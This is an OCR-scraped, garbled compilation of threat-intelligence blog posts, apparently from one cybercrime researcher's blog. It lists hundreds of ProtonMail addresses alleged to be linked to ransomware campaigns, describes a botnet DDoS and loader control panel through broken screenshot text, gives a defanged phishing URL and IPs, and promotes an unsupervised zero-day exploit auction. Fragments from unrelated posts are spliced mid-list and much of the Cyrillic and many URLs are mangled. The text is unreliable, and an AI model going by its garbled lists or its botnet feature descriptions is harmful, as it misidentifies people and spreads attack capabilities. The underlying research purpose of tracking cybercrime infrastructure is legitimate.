somware themed email address accounts with the idea to attempt to take them offline poten- 
tially causing financial and related troubles to the individuals involved in these campaigns. 


Sample currently active Protonmail ransomware themed email address accounts known to 
have been involved in related fraudulent and malicious campaigns: 


05250lock@protonmail.com 
Ox1service@protonmail.com 
1_kill yourself 1@protonmail.com 
1lrestOre@protonmail.com 
2020x0@protonmail.com 
4lok3r@protonmail.com 
AbbsChevis@protonmail.com 
AdvancedBackup@protonmail.com 
BTCBREWERY@protonmail.com 
BackFileHelp@protonmail.com 
Bossi tosi@protonmail.com 
Brilliancebk@protonmail.com 
Catsexy@protonmail.com 
Corpseworm@protonmail.com 
CottleAkela@protonmail.com 
Cryptmanager@protonmail.com 
DatarestOre@protonmail.com 
DavidsHelper@protonmail.com 
Deccoder431@protonmail.com 
DecrypterSupport@protonmail.com 
Decryptharma@protonmail.com 
Decryptions@protonmail.com 
Decryptutility@protonmail.com 
DharmaParrack@protonmail.com 
DiskDoctor@protonmail.com 
Dsupport@protonmail.com 
EMAIL@protonmail.com 
Encryptedxtredboy@protonmail.com 
F-data@protonmail.com 
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Filedecryptor@protonmail.com 
Filegorillal388@protonmail.com 
FilesRecoverEN@Protonmail.com 
Folieloi@protonmail.com 
FreeWizard9@protonmail.com 
GetYourFilesBack@protonmail.com 
Hichkasam@protonmail.com 
Honeylock@protonmail.com 
HydraHelp1@protonmail.com 
Jack76Duran@protonmail.com 
JeanRenoAParis@protonmail.com 
JinMaglaya@protonmail.com 
JoniCarter@protonmail.com 
Keta990@protonmail.com 
Killback@protonmail.com 
Kromber@protonmail.com 
Leviathanl13@protonmail.com 
Lizardbkup@protonmail.com 
Look1213@protonmail.com 
Mammon-decrypt@protonmail.com 
MayarChenot@protonmail.com 
MerlinStusan@protonmail.com 
MerlinVelso@protonmail.com 
Mespinoza980@protonmail.com 
MilesFlannagan@protonmail.com 
Mr.TeslaBrain@protonmail.com 
NetGanster@protonmail.com 
Oktropys@protonmail.com 
Openfileyou@protonmail.com 
PabFox@protonmail.com 
Panzergen552@protonmail.com 
Pentagon11@protonmail.com 
PhanthavongsaNeveyah@protonmail.com 
Pringls us@protonmail.com 
Quantroei@protonmail.com 
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RECOVERUNKNOWN@protonmail.com 
Recoverybat@protonmail.com 
Recoveryhelp2019@protonmail.com 
Recuperadados@protonmail.com 
RemotePChelper@protonmail.com 
RomanchukEyla@protonmail.com 
SafeGman@protonmail.com 

Santa helper@protonmail.com 
SayanWalsworth96@protonmail.com 
SchreiberEleonora@protonmail.com 
ScorpionEncryption@protonmail.com 
SpadeEncrypt@protonmail.com 
Steven77xx@protonmail.com 
SupportOdveta@protonmail.com 
SuzuMcpherson@protonmail.com 
Tbr66@protonmail.com 
TentwenUpper1l@protonmail.com 
TimisoaraHackerleam@protonmail.com 
TimothyCrabtree@protonmail.com 
Tizer77234@protonmail.com 
Unlock11@protonmail.com 
UnlockAlexKingman@protonmail.com 
Vitaly. Yermakov@protonmail.com 
VoidFiles@protonmail.com 
Wecanhelp@protonmail.com 

William _Kidd _2019@protonmail.com 
X280@protonmail.com 
Xtredboy@protonmail.com 

aam _sysadmin@protonmail.com 
achtung _admin@protonmail.com 
admincrypt@protonmail.com 
agent.dmr@protonmail.com 
aid.keepcalm@protonmail.com 
andrey.taranov@protonmail.com 


anna.kurtz@protonmail.com 
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anon4113@protonmail.com 
anonymoushacks33@protonmail.com 
aperfectday2018@protonmail.com 
apoyo2019@protonmail.com 
artemy75@protonmail.com 
askhelp@protonmail.com 
asmodey3301@protonmail.com 
aztecdecrypt@protonmail.com 
backinfo@protonmail.com 
backuppcl@protonmail.com 
backuppc@protonmail.com 
bakfiles@protonmail.com 
barracudahelp@protonmail.com 
batary5588@protonmail.com 
bbitcrypt@protonmail.com 
billwong73@protonmail.com 

bit decrypt@protonmail.com 
bitsupportz@protonmail.com 
blackheel@protonmail.com 
blackroot54@protonmail.com 
brian.r.goodwin@protonmail.com 
bronmerkberpa1976@protonmail.com 
bsprjl020@protonmail.com 

btc _bitts@protonmail.com 
btcontact@protonmail.com 
callmegoat@protonmail.com 
cashdashsentme@protonmail.com 
castor-troy-restore@protonmail.com 
cheetOs de@protonmail.com 
cleverhorse@protonmail.com 
com-gloria@protonmail.com 
crioso@protonmail.com 
cryptghOst@protonmail.com 

crypto wannacash@protonmail.com 
cryptofiles20202020@protonmail.com 
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cryptomadbusiness@protonmail.com 
cryptoplant@protonmail.com 
cyber.duskfly@protonmail.com 
cynthia-it@protonmail.com 
data1992@protonmail.com 
databack2@protonmail.com 
dawndec001@protonmail.com 
dec.service@protonmail.com 
decodeodveta@protonmail.com 
decoderma@protonmail.com 
decphob@protonmail.com 
decrypt.russ@protonmail.com 
decrypt24@protonmail.com 
decrypt4data@protonmail.com 
decrypterfile@protonmail.com 
decryptmystuff@protonmail.com 
decryptxxx@protonmail.com 
deltatechit@protonmail.com 
devilguy666@protonmail.com 
dresdent@protonmail.com 
duskeer@protonmail.com 
egalytyy@protonmail.com 
eladovinl1975@protonmail.com 
encryptc4@protonmail.com 
encryptfile@protonmail.com 
fahydremu1981@protonmail.com 
fairman0023@protonmail.com 
fileb@protonmail.com 
filedownload2020@protonmail.com 
files2@protonmail.com 
filesreturn247@protonmail.com 
flapalintal950@protonmail.com 
flopored@protonmail.com 
flower.harris@protonmail.com 


flowerboard@protonmail.com 
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fox2278@protonmail.com 
freefoams@protonmail.com 
friends2019@protonmail.com 
g.kulahmet@protonmail.com 
gareth.mckie3I|@protonmail.com 
geneve010@protonmail.com 
geneve020@protonmail.com 
getscoin2@protonmail.com 
getscoin3@protonmail.com 
getyourdata@protonmail.com 
guaranteedsupport@protonmail.com 
haunexuwofwuf@protonmail.com 
help.me24@protonmail.com 
help73@protonmail.com 
helpadmin2@protonmail.com 
helpdiamond@protonmail.com 
helpnetin@protonmail.com 
helpteam38@protonmail.com 
helpyourdesk11@protonmail.com 
hidebak@protonmail.com 
hjelp.main@protonmail.com 
honestman0023@protonmail.com 
ialpatntedu@protonmail.com 
imBoristheBlade@protonmail.com 
incognitoman@protonmail.com 
incongnitoman@protonmail.com 
ivanmalahov@protonmail.com 
jOra@protonmail.com 
jackiesmith1 76@protonmail.com 
johnsonwhate@protonmail.com 
jokeroo@protonmail.com 
jonskuper578@protonmail.com 
keepcredit0l15@protonmail.com 
keychild@protonmail.com 
khalate@protonmail.com 
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B task manager :: JobaBneHve HOBOX 3agaun :: SaprysKa 
foo 
O 
O 


Or paki witb KON-BO 3afrpy30K 


Bot Description: 


. Completely invisible Bot work in the system. 
. Not loads system. 

. Invisible in the process. 

. Workaround all firewall. 

. Bot implemented as a driver. 


OBWNF 


Bce CTparib!: 


VY? |) Asia/Pacific Region 
[| Europe | Wl Andorra 

4 ES united Arab Emirates MV == Afghanistan 

\V El Antiqua and Barbuda | iB Anguila 

| Mil Albania |_| Ml armenia 

|_| s® Netherlands Antifes | Bid angola 


Functions Bot (constantly updated): 


1. Downloading a file (many options). 
2. HTTP DDoS (many options, including http authentication). 
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khfsuca@protonmail.com 
kickclakus@protonmail.com 
koxic@protonmail.com 
lion7872@protonmail.com 
loybranunun1975@protonmail.com 
lucky top@protonmail.com 
Ixhlp@protonmail.com 
m4xroothackerteam@protonmail.com 
maill helpme@protonmail.com 
mammon0503@protonmail.com 
mantiticvil976@protonmail.com 
mattpear@protonmail.com 
maxidecrypt@protonmail.com 
missdecryptor@protonmail.com 
momsbestfriend@protonmail.com 
mr.crypteur@protonmail.com 
mr.dec@protonmail.com 
mrbin775@protonmail.com 
nAskHelp@protonmail.com 
nDiskDoctor@protonmail.com 
nHydraHelp1@protonmail.com 
nRecoverybat@protonmail.com 
nationalsiense@protonmail.com 
newneo1312@protonmail.com 
nohopeproject@protonmail.com 
nostrol9@protonmail.com 
oceannew _vb@protonmail.com 
omegax0@protonmail.com 
onepconebtc@protonmail.com 
onimransom@protonmail.com 
ooosferaplus@protonmail.com 
pacman.support@protonmail.com 
painplain98@protonmail.com 
panda7499@protonmail.com 


patern32@protonmail.com 
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pentaxyz777@protonmail.com 
pentros30@protonmail.com 
petersburgrecover@protonmail.com 
petrov441@protonmail.com 
pizdasobaki@protonmail.com 
po2977@protonmail.com 
pyyring23@protonmail.com 
qkhooks0708@protonmail.com 
raingemaximo@protonmail.com 
raynorzlol@protonmail.com 
rdpconnect@protonmail.com 
rebushelp@protonmail.com 
recfiles@protonmail.com 
recover85@protonmail.com 
recover 24 7@protonmail.com 
recoverycode@protonmail.com 
recoverysq|@protonmail.com 

rep stosd@protonmail.com 
reservedecryption@protonmail.com 
ripntfs@protonmail.com 
rusoftfond@protonmail.com 
slanler111@protonmail.com 
sailormorgan@protonmail.com 
salutem@protonmail.com 
savemyfiles@protonmail.com 
securityitl23@protonmail.com 
servicedeskpay@protonmail.com 
shellexec@protonmail.com 
siniyzabor@protonmail.com 
soft.russian@protonmail.com 
softs98@protonmail.com 
spO0Of3rsuppOrt@protonmail.com 
sp02@protonmail.com 
spacexhuman@protonmail.com 
support4you@protonmail.com 
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support _blackkingdom2@protonmail.com 
supportcrypt2019@protonmail.com 
t310ea89b4347@protonmail.com 
teamvi@protonmail.com 
teamvv@protonmail.com 
tellyouthepass@protonmail.com 
the.dodger@protonmail.com 
tomascry@protonmail.com 
trees.jog.bepabepababy1@protonmail.com 
tuhafcoderus@protonmail.com 
unibovwood1984@protonmail.com 
unlock0101@protonmail.com 
unlockme123@protonmail.com 
unlockransomware@protonmail.com 
upfileme@protonmail.com 

use _harrd@protonmail.com 
vashmail@protonmail.com 
vendetta553@protonmail.com 
villiamsscorj rembly@protonmail.com 
vine77725@protonmail.com 
virtualhorse1@protonmail.com 

vurten _knyert@protonmail.com 
wayneevenson@protonmail.com 
werichbin@protonmail.com 
worldofdonkeys@protonmail.com 
xersami@protonmail.com 
youneedmail@protonmail.com 
zagrec@protonmail.com 
zorab28@protonmail.com 
zoye596@protonmail.com 


Sample currently active Protonmail ransomware themed email address accounts known to 
have been involved in related fraudulent and malicious campaigns include: 


getscoin3@protonmail.com 
mstr.hack@protonmail.com 
stevemartin777@protonmail.com 
Benford333@protonmail.com 
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nBenford333@protonmail.com 
fortihooks@protonmail.com 
nfortihooks@protonmail.com 
thecurelegion@protonmail.com 
support981723721@protonmail.com 
sifremicoz@protonmail.com 
yourfile2020@protonmail.com 
Catsexy@protonmail.com 
Recuperadados@protonmail.com 
youneedmail@protonmail.com 
Decryptutility@protonmail.com 
MerlinStusan@protonmail.com 
Tizer77234@protonmail.com 
recfiles@protonmail.com 
mr.dec@protonmail.com 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
castor-troy-restore@protonmail.com 
Mammon-decrypt@protonmail.com 
wayneevenson@protonmail.com 
incongnitoman@protonmail.com 
Santa _helper@protonmail.com 
F-data@protonmail.com 
decryptxxx@protonmail.com 
Mespinoza980@protonmail.com 
backinfo@protonmail.com 
rdpconnect@protonmail.com 
tomascry@protonmail.com 
loybranunun1975@protonmail.com 
securityitl23@protonmail.com 
ripntfs@protonmail.com 
khfsuca@protonmail.com 
getscoin2@protonmail.com 
zagrec@protonmail.com 
teamvv@protonmail.com 
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databack2@protonmail.com 
Ixhlp@protonmail.com 
teamvi@protonmail.com 
onepconebtc@protonmail.com 

bit decrypt@protonmail.com 
help.me24@protonmail.com 
mr.crypteur@protonmail.com 
recoverysq|@protonmail.com 
anna.kurtz@protonmail.com 
agent.dmr@protonmail.com 
painplain98@protonmail.com 
askhelp@protonmail.com 
AstraRansomware@protonmail.com 
blackheel@protonmail.com 
btcontact@protonmail.com 
HydraHelp1@protonmail.com 
mammon0503@protonmail.com 
PabFox@protonmail.com 
Jack76Duran@protonmail.com 
RemotePChelper@protonmail.com 
Recoverybat@protonmail.com 
Brilliancebk@protonmail.com 
Deccoder431@protonmail.com 
Lizardbkup@protonmail.com 
Xtredboy@protonmail.com 
TimothyCrabtree@protonmail.com 
cheetOs de@protonmail.com 
Pringls us@protonmail.com 
crioso@protonmail.com 
GetYourFilesBack@protonmail.com 
Kelly.lb@protonmail.com 
nRecoverybat@protonmail.com 
nAskHelp@protonmail.com 
jackiesmith176@protonmail.com 


nohopeproject@protonmail.com 
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salutem@protonmail.com 
ivanmalahov@protonmail.com 
ooosferaplus@protonmail.com 
rusoftfond@protonmail.com 
andrey.taranov@protonmail.com 
g.kulahmet@protonmail.com 
soft.russian@protonmail.com 
momsbestfriend@protonmail.com 
the.dodger@protonmail.com 
jOra@protonmail.com 
sp0O0f3rsuppOrt@protonmail.com 
shellexec@protonmail.com 

rep _stosd@protonmail.com 
support4you@protonmail.com 
devilguy666@protonmail.com 
batary5588@protonmail.com 
Panzergen552@protonmail.com 
vendetta553@protonmail.com 
Filegorillal388@protonmail.com 
vine77725@protonmail.com 
panda7499@protonmail.com 
jonskuper578@protonmail.com 
fox2278@protonmail.com 
lion7872@protonmail.com 
filesreturn247@protonmail.com 
slanler111@protonmail.com 
mrbin775@protonmail.com 
decryptmystuff@protonmail.com 
oceannew _vb@protonmail.com 
decrypt24@protonmail.com 
Wecanhelp@protonmail.com 
hidebak@protonmail.com 
com-gloria@protonmail.com 
fileob@protonmail.com 
upfileme@protonmail.com 
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helpteam38@protonmail.com 


William _Kidd _2019@protonmail.com 


cleverhorse@protonmail.com 


Keta990@protonmail.com 


supportcrypt2019@protonmail.com 


zoye596@protonmail.com 
Quantroei@protonmail.com 
sailormorgan@protonmail.com 
raynorzlol@protonmail.com 
friends2019@protonmail.com 
worldofdonkeys@protonmail.com 
bbitcrypt@protonmail.com 
files2@protonmail.com 
patern32@protonmail.com 
kickclakus@protonmail.com 
Admincrypt@protonmail.com 
decrypt4data@protonmail.com 
lucky _top@protonmail.com 
apoyo2019@protonmail.com 
werichbin@protonmail.com 
cynthia-it@protonmail.com 
deltatechit@protonmail.com 
2020x0@protonmail.com 
decphob@protonmail.com 
DavidsHelper@protonmail.com 
spacexhuman@protonmail.com 
recoverycode@protonmail.com 
pyyring23@protonmail.com 
virtualhorse1@protonmail.com 
use _harrd@protonmail.com 
helpyourdesk11@protonmail.com 
maxidecrypt@protonmail.com 
JeanRenoAParis@protonmail.com 
Leviathan13@protonmail.com 


brian.r.goodwin@protonmail.com 
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imBoristheBlade@protonmail.com 
johnsonwhate@protonmail.com 
1lrestOre@protonmail.com 
aid.keepcalm@protonmail.com 
rebushelp@protonmail.com 
cryptghOst@protonmail.com 
backuppc@protonmail.com 
backuppcl@protonmail.com 
TimisoaraHackerleam@protonmail.com 
m4xroothackerteam@protonmail.com 
Vitaly. Yermakov@protonmail.com 
UnlockAlexKingman@protonmail.com 
barracudahelp@protonmail.com 
crypto wannacash@protonmail.com 
help73@protonmail.com 
petrov441@protonmail.com 
MilesFlannagan@protonmail.com 
dec.service@protonmail.com 
incognitoman@protonmail.com 
siniyzabor@protonmail.com 

recover 24 7@protonmail.com 
achtung _admin@protonmail.com 
aam _sysadmin@protonmail.com 
helpadmin2@protonmail.com 
CottleAkela@protonmail.com 
AbbsChevis@protonmail.com 
JinMaglaya@protonmail.com 
SuzuMcpherson@protonmail.com 
DharmaParrack@protonmail.com 
MayarChenot@protonmail.com 
PhanthavongsaNeveyah@protonmail.com 
RomanchukEyla@protonmail.com 
SayanWalsworth96@protonmail.com 
SchreiberEleonora@protonmail.com 
artemy75@protonmail.com 
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jokeroo@protonmail.com 
tellyouthepass@protonmail.com 
BackFileHelp@protonmail.com 
RECOVERUNKNOWN@protonmail.com 
DecrypterSupport@protonmail.com 
unlockme123@protonmail.com 
Decryptions@protonmail.com 
ScorpionEncryption@protonmail.com 
Steven77xx@protonmail.com 
DatarestOre@protonmail.com 
Recoveryhelp2019@protonmail.com 
blackroot54@protonmail.com 
Mr.TeslaBrain@protonmail.com 
filedownload2020@protonmail.com 
Honeylock@protonmail.com 
AdvancedBackup@protonmail.com 
recover85@protonmail.com 
unlock0101@protonmail.com 
SupportOdveta@protonmail.com 
softs98@protonmail.com 
vashmail@protonmail.com 
Filedecryptor@protonmail.com 
decodeodveta@protonmail.com 
t310ea89b4347@protonmail.com 
cryptomadbusiness@protonmail.com 
FreeWizard9@protonmail.com 
omegax0@protonmail.com 
flower.harris@protonmail.com 
flowerboard@protonmail.com 
X280@protonmail.com 
decrypt.russ@protonmail.com 
petersburgrecover@protonmail.com 
dawndec001@protonmail.com 
lafoievologjaninl23@protonmail.com 


mantiticvil976@protonmail.com 
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fahydremu1981@protonmail.com 
flapalintal950@protonmail.com 
xersami@protonmail.com 

cheotOs _de@protonmail.com 
puljaipopre1981@protonmail.com 
viomukinam1978@protonmail.com 
onlinebigbrotheriswatchingyou@protonmail.com 
msupport2019@protonmail.com 
BruceCohn88@protonmail.com 
runlocker@protonmail.com 
yesbay@protonmail.com 
helpoperator2@protonmail.com 
05250lock@protonmail.com 
tuhafcoderus@protonmail.com 
support _blackkingdom2@protonmail.com 
Bossi tosi@protonmail.com 

maill helpme@protonmail.com 
newneo1312@protonmail.com 
bitsupportz@protonmail.com 
asmodey3301@protonmail.com 

btc _bitts@protonmail.com 
reservedecryption@protonmail.com 
po2977@protonmail.com 
Tbr66@protonmail.com 
Encryptedxtredboy@protonmail.com 
Hichkasam@protonmail.com 
helpdiamond@protonmail.com 
encryptc4@protonmail.com 
decoderma@protonmail.com 
missdecryptor@protonmail.com 
VoidFiles@protonmail.com 
Pentagon11@protonmail.com 
guaranteedsupport@protonmail.com 
decrypterfile@protonmail.com 
encryptfile@protonmail.com 
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PR Task ees :: fobaBnenve HOBOK 3agaun :: DDoS 
[____Mopreepeepa] BO 
fname=vasiaévalue=100 0000 
(3 
feo 


[ __—_apamerpe| nane=vasia&value=100 
[_Moteroe or Gora | [32 
[_Konmwecteo Gores | [200 
[____Asropusauia] Login: [vasiliy | Pesswere: 
[Tpoaanmermensiocrs| Ame: ‘| Macos: (1S——————dMvewr: (20d 
[bee crpare |) 


The web interface 


- Convenient manager tasks. 


- Every task can be stopped, put on pause, etc. ... 


- Interest and visual scale of the task. 


- A task manager for DDoS and Loader 


NpogoMmkKuTeNeHOCTE “Aven: Uacoe: Muy: 
Bce ctpaxi: | [_] 

Cj ? | Asia/Pacific Region 
| Europe | Bl andorra 
| ES united Arab Emirates || =m Afghanistan 
__) El Antigua and Barbuda | ih Anguilla 
| Mil Abania _| Mil armenia 
| S® Netherlands Antilles _| Hil Angola 
|) EQ) Antarctica | == Argentina 
|_| Et American Samoa | = Austria 
| i Australia __| Si aruba 
| i Azerbaijan | il Bosnia and Herzegovina 
| Wl Barbados | Ml Bangladesh 
| BA Belgium | El Burkina Faso 


- For DDoS tasks 
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SpadeEncrypt@protonmail.com 
Openfileyou@protonmail.com 
zorab28@protonmail.com 
Alok3r@protonmail.com 
keepcredit0l15@protonmail.com 
honestman0023@protonmail.com 
fairman0023@protonmail.com 
geneve010@protonmail.com 
geneve020@protonmail.com 
haunexuwofwuf@protonmail.com 
cyber.duskfly@protonmail.com 
duskeer@protonmail.com 
anon4113@protonmail.com 
egalytyy@protonmail.com 
onimransom@protonmail.com 
FilesRecoverEN@Protonmail.com 
nationalsiense@protonmail.com 
freefoams@protonmail.com 

1_kill yourself 1@protonmail.com 
Look1213@protonmail.com 
bronmerkberpa1l976@protonmail.com 
BTCBREWERY@protonmail.com 
data1992@protonmail.com 
pentros30@protonmail.com 
pentaxyz777@protonmail.com 
TentwenUpperl@protonmail.com 
DiskDoctor@protonmail.com 
ialpatntedu@protonmail.com 
cryptofiles20202020@protonmail.com 
pacman.support@protonmail.com 
nDiskDoctor@protonmail.com 
vurten _knyert@protonmail.com 
Dsupport@protonmail.com 
SafeGman@protonmail.com 


aztecdecrypt@protonmail.com 
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pizdasobaki@protonmail.com 
cryptoplant@protonmail.com 
callmegoat@protonmail.com 
NetGanster@protonmail.com 
dresdent@protonmail.com 
eladovinl1975@protonmail.com 
cashdashsentme@protonmail.com 
Cryptmanager@protonmail.com 
Corpseworm@protonmail.com 
trees.jog.bepabepababy1@protonmail.com 
MerlinVelso@protonmail.com 
Ox1service@protonmail.com 
Unlock11@protonmail.com 
qkhooks0708@protonmail.com 
Kromber@protonmail.com 
raingemaximo@protonmail.com 
gareth.mckie3I@protonmail.com 
aperfectday2018@protonmail.com 
bakfiles@protonmail.com 
frosculandral975@protonmail.com 
trafyralhil988@protonmail.com 
sanctornopul1986@protonmail.com 
ringpawslanin1984@protonmail.com 
liebupneoplan19@protonmail.com 
stivobemun1979@protonmail.com 
guifullchartil9 70@protonmail.com 
phrasitliter1981@protonmail.com 
elsleepamlen1988@protonmail.com 
southbvilolor1973@protonmail.com 
glocadboysun1978@protonmail.com 
carbedispgret1983@protonmail.com 
listun@protonmail.com 
mirtum@protonmail.com 
maxgary777@protonmail.com 
ranosfinger@protonmail.com 
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bootsdurslecne1976@protonmail.com 
rinmayturly1972@protonmail.com 
niggchiphoter1974@protonmail.com 
lebssickronne1982@protonmail.com 
daybayrikil970@protonmail.com 
southbvillorl1973@protonmail.com 
bottesdurslecne1976@protonmail.com 
unlockransomware@protonmail.com 
fahidremu1981@protonmail.com 
neybvilolor1973@protonmail.com 
frasesitliter1981@protonmail.com 
getyourdata@protonmail.com 
nostrol9@protonmail.com 
RestoreFile@protonmail.com 

Stay tuned! 


1. https://1.bp.blogspot.com/-4HntQsybfrE/YVolFKWm3AI /AAAAAAAAUWO/ jkE4Yg2pgiYu0BVu9pPQef fEMp6zmMvZACLcBGAsSYHQ 
s1168/Screenshot_48. png 
2. https://ddanchev. blogspot .com/2020/11/exposing-protonmail-and-tutanotas.htm 


17.10.12 New Dark Web Onion Address! (2021-10-04 10:02) 


[1] 


RECENT POSTS 
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Presentation - (POF) Reality” Presentation — [POF] Ecosystem” Presentation - (POF) im Cybercrime tor 2007" Busted” Department -A 
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Dear blog readers, 


Check out my new Dark Web Onion address which is - [2]http://aklw6fojficmu3zqsdsffprbas3kqrhee- 
j4ntvynfl5xkrjpqghiq55yd.onion/ wordpress where | intend to continue publishing high-quality 
and never-released before cybercrime research and threat intelligence including OSINT 
analysis type of research on a daily basis. 


Big thanks to everyone visiting my Dark Web Onion on the Dark Web and keep it coming. 


[3] 

Online Users: 1 

Visitors Visits 
Today: 1 678 
Yesterday: 1 6,018 
Last 7 Days (Week): 8 78,878 
Last 30 Days (Month): 31 102,190 
Last 365 Days (Year): 224 137,316 
Total: 224 137,316 


Stay tuned! 


1, fittps://A. bp. blogspot .con/~hwukeLXLDI/ VL Rog jI/AAAAAAAAINe /VreSL6ASbOOROTOGY jy ACTH VSApUS4gCL.cBGASYRG 
2, http: / /aklw6fo ficaudzqsdoiiprbasdkqrhee jéutvyafl Srkr jpqhgS5ya, onion/ wordpress 
3, http ://1. bp: blogspot. con/~o64¢ FywaSk8/YUqbnk¢hAFT/ AAAAAAAAUIE/X_sz¥eAResYGSa-RpaPO_SHN-2BB6og0L.cBGAsYRG 
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17.10.13 Looking for a Cyber Security Project Investor? (2021-10-04 14:09) 


Zero Day Exploit Auction 


We're a partnership between the world’s leading expert in the field of cybercrime research OSINT and threat intelligence gathering 
Dancho Danchev and one of the Web's most popular destinations for hackers and security experts since 1994 the infamous 
Astalavista. box.sk where we aim to set the foundationds for a ground-breaking and fully working Zero Day Exploits auction business 
model where users researchers vendors and companies can buy and sell exploits in an anonymous and fully automated without any 
sort of supervision fashion where the ultimate goal would be to improve everyone's security and provide the necessary publicity and 
financial incentive for researchers and users to submit buy and sell their exploits online 


Current Project Statistics: 
Exploits: 36,640 | Researchers: 44,134 


Multiple Local Versions for This Project Include: 
Russia | Germany | Turkey | France | Italy | Spain | Romania | Poland | Argentina | Japan | China | 


Zero Day Exploit and 
Vulnerability Auction 


Please contact us via mail ( 
or XMPP/Jabber/OMEMO ( 
) with your exploit and vulnerability submissions! 


PGP Key: 


https://astalavista.box.sk/Dancho_Danchev.asc 


Dear blog readers, 


I’ve just received a direct acquisition proposal for a high-profile cyber security project and | 
need an investment partner who can work with me and make it happen. 


Are you interested in working with me for this project? Drop me a line at dan- 
cho.danchev@hush.com 


Sample project screenshots: 
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17.10.16 Dancho Danchev’s Ultimate "Cybercrime Research and Fighting Toolkit" - 
Order a USB Stick Today! (2021-10-08 19:38) 


Dear blog readers, 


[1]Order today! 
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Stay tuned! 


1. 
18322 


Bots involved in DDoS ’f. 
Condition of the victim (works, fell). 


[nabHoe Meno ¥ Sagayn ¥ CnpaBKa ¥ Bol nonbsoBaTenb: admin ( Bixog ) 


| BE :: HobaBnenve HOBOK 3agaunv :: DDoS : ICMP 


| TASK NAME ||| 


Pa3smep nakeTa B 
Balttax 


[Tovar oor] 
[Renner for 


r 
Bce CTpaHbl: |) 


2. Bots manager 

- Displays a list of bots (postranichno). 

- Obratseniya date of the first and last. 

- ID Bot. 

- Country Bot. 

- Type Bot. 

- The status Bot (online / offline). 

- Bot bandwidth to different parts of the world (europe, asia). 
- The possibility of removing bots 


- When you click on ID Bot loadable still a wealth of information about it 
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17.10.17. Dancho Danchev’s "Cybercrime Research and Cybercrime Fighting" USB 
Stick - Grab the Torrent! (2021-10-10 02:55) 


Dear blog readers, 


[1]Grab the Torrent! Consider visiting the infamous https://astalavista.box.sk and order a copy 
which would greatly help me fuel growth into my research and actually help me pay the bills. 
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a Cybercrime_Forum_Data_Set_2021 

) Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 

ry Dancho_Danchev_Blog_Archive_JSON_2021 

my Dancho_Danchev_Blog_Cybercrime_Research_Photos_Compilation_2021 

ad Dancho_Danchev_Blog_E-Book_Archive_2021 

ad Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 
) Dancho_Danchev_Cybercrime_Research_2021 _Personally_Identifiable_Information_Compilation 
db Dancho_Danchev_Cybercrime_Research_Personal_Photos_Compilation_2021 
ad Dancho_Danchev_Cybercrime_Research_Presentations_2021 

a Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 
ad Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 

& Dancho_Danchev_Iran_Hackers_Personally_Identifiable_Information_Compilation_2021 
ad Dancho_Danchev_Iran_White_Paper_2021 

r Dancho_Danchev_Iran_White_Paper_Part_Two_2021 

& Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 

my Dancho_Danchev_Malware_Trends_White_Paper_2021 

PY) Dancho_Danchev_Medium_Research_Compilation_2021 

ad Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 

PY) Dancho_Danchev_Personal_Photos_Compilation_2021 

ad Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 

) Dancho_Danchev_Security_Policy_White_Paper_2021 

a Dancho_Danchev_Twitter_Account_Archive_2021 

) Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 

ad Dancho_Danchev_Webroot_Research_Compilation_2021 

) Dancho_Danchev_ZDNet_Research_Compilation_2021 

LL) WhoisXML_API_Research_Articles_2021 


Stay tuned! 


1. https://unit-123.org/wp-content/uploads/2021/10/Dancho_Danchev_USB_Stick_Cybercrime_Forum_Data_Set_Cyberc 


ime_OSINT_Threat_Intelligence_Research_Torrent_Compila 


17.10.18 The Dark Web Market Segment - FUD or Hype? - An Analysis 
(2021-10-18 21:25) 


In recent years it became clearly evident that the over-population of the Dark Web with hun- 
dreds of thousands of active low profile and high-profile Dark Web Onion web sites 
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17.10.19 Massive Phishing Campaign Domain Farm Spotted in the Wild Uses 
Google’s Firebase Thousands of Users Affected - An OSINT Analysis 
(2021-10-18 22:18) 


[1] 


I’ve just stumbled across a pretty decent and massive phishing domains farm that using 
Google’s for the purpose of hosting and distributing the rogue and malicious content. 


In this post I'll provide actionable intelligence on the infrastructure behind it including to discuss 
in-depth the TTPs (Tactics Techniques and Procedures) of the cybercriminals behind it. 


Sample rogue and malicious URL known to have participated in the campaign: 


hxxp://js-82wha8sw738.web.app/sc/css.css 

Sample malicious and rogue responding IPs known to have participated in the campaign: 
199.36.158.100 

151.101.1.195 

151.101.65.195 
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Sample screenshots of the rogue and malicious phishing domains known to have been in- 
volved in the campaign: 


[2] 


[3] 
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[4] 
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[5] 
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Q Mecherche 


ers ot tortans Weetnet Packs Wvtermet + Ms TV ¢f @vertissement 


Identifiez-vous 


ndiquez votre compte Orange 


Sasemnez votre mot de passe 


| sieeniner MC 


@ Arte ot comtact foren Pent: areet are tem 


oes gales «©= Condes personmeties  Accessibilté mayrader un Comters 


[6] 
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[7] 
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Santander 


[8] 
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[9] 
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co 
Cnvcon 6GoTos 


a 


JOOOOOOO0O0000 


2008-04-04 17:16:31 
2008-04-04 17:05:36 
2008-04-04 16:22:05 
2008-04-04 15:00:16 
2008-04-04 13:32:17 
2008-04-04 11:02:36 
2008-04-04 09:56:37 
2008-04-04 08:01:29 
2008-04-04 06:47:16 
2008-04-04 04:55:03 
2008-04-04 03:25:58 
2008-04-04 03:16:49 
2008-04-04 02:21:41 


ARAA AA AA AOL 


3. Statistics botneta 
- Statistics both common and build Bot. 
- Information on the growth and decline botneta dates (and build). 
- Bots online 


- All bots 
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1870893f7f259440_{0.1] 
_ serverhk-93fryO_[0.1] 


privat-pkiGop9c_{0.1] 
mom-av231812ysa_{0.1] 
dane_(0.1) 

computer [0.1] 
ASHRAF_[0.1] 
savio_[0.1] 
toinho-1f022896_[0.1] 
winxp-00ef7c78b_[0.1] 
angelo-uvctméla_[0.1] 
xgved28so0d5y39_{0.1] 


Tenner wsaam fo 41 


Sg 
3 


) 
L) Undopmauina © crpane Baxperre ff 
Dwnetpopate no crpane JPCountry: 


Japan 

All Bots: 2 

Online Bots: 1 

New Bots: 2 

Dead Bots: 0 
[=a offine 
== offine 
an afin 


RRR ERR ERE 


Ba 


3) fa ft 


) stories Appeal Form 


= hoe f you think your page wes restricted by mistake, pleate fill out thes form 


Appeal a Page Policy Violation: 


